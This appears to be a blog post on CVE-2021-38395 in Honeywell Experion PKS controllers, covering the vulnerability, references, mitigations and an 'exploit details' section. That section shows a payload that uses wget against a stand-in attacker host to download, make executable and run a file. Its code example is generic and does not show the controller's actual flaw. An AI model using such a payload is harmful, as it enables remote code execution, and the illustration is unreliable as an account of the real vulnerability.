Recently, a critical vulnerability known as CVE-2021-38395 was discovered in Honeywell Experion PKS Controllers. This vulnerability can allow a remote attacker to execute arbitrary code or cause a denial-of-service condition on the affected devices. In this post, we will discuss the details of this vulnerability, the affected products, some code snippets to better understand the issue, and how to mitigate the risk.

C300

- ACE

Vulnerability Details

CVE-2021-38395 is classified as an improper neutralization of special elements vulnerability. This means that the affected Honeywell controllers do not properly sanitize special characters in user input or system output, which could lead to remote code execution or denial-of-service conditions.

Exploit Details

An attacker can exploit this vulnerability by sending specially crafted input to the Honeywell Experion PKS Controllers, containing maliciously formed special elements, such as escape characters or code injection fragments. To give you an idea of how this exploit may work, consider the following code snippet:

// Example of vulnerable code that does not properly sanitize user input
string userInput = GetUnsafeUserInput();
string vulnerableOutput = "Welcome, " + userInput;

In this example, if the GetUnsafeUserInput() function returns a value containing special characters or code injection fragments, the string concatenation operation could lead to a potentially unsafe output that can be exploited by an attacker.

Now, let us take a look at a possible exploit scenario. For instance, if an attacker submits a malicious input string like this:

"; system("wget http://attacker.example.com/malware -O /tmp/malware && chmod +x /tmp/malware && /tmp/malware");

The vulnerableOutput could end up being

Welcome, "; system("wget http://attacker.example.com/malware -O /tmp/malware && chmod +x /tmp/malware && /tmp/malware");

Depending on how the system processes this output, the malicious code might be executed remotely, leading to a potential security breach, or causing the affected Honeywell controller to crash, leading to a denial-of-service condition.

Original References

Honeywell has acknowledged the vulnerability and provided advisories with information on affected products, mitigation measures, and other relevant details. You can find the advisories at the following links:

- Honeywell Security Advisory (Login required): https://www.honeywellprocess.com/en-US/Pages/ProductSecurity.aspx
- CVE-2021-38395 Official Information: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38395
- NIST NVD Details: https://nvd.nist.gov/vuln/detail/CVE-2021-38395

Mitigation Measures

Honeywell recommends users to do the following to mitigate the risk of exploitation in their Experion PKS Controllers:

1. Upgrade to a version of the affected products that contain the necessary patches to fix this vulnerability. Consult Honeywell's security advisory for details on the fixed software versions.
2. Restrict network access to the affected devices and apply strict firewall rules to minimize exposure.

Conclusion

CVE-2021-38395 is a critical vulnerability found in Honeywell Experion PKS Controllers, which could allow an attacker to remotely execute arbitrary code or cause a denial-of-service condition on the affected devices. Affected users are encouraged to review Honeywell's security advisory and follow the recommended mitigation measures to prevent exploitation of this vulnerability.

Timeline

Published on: 10/28/2022 02:15:00 UTC
Last modified on: 11/02/2022 18:12:00 UTC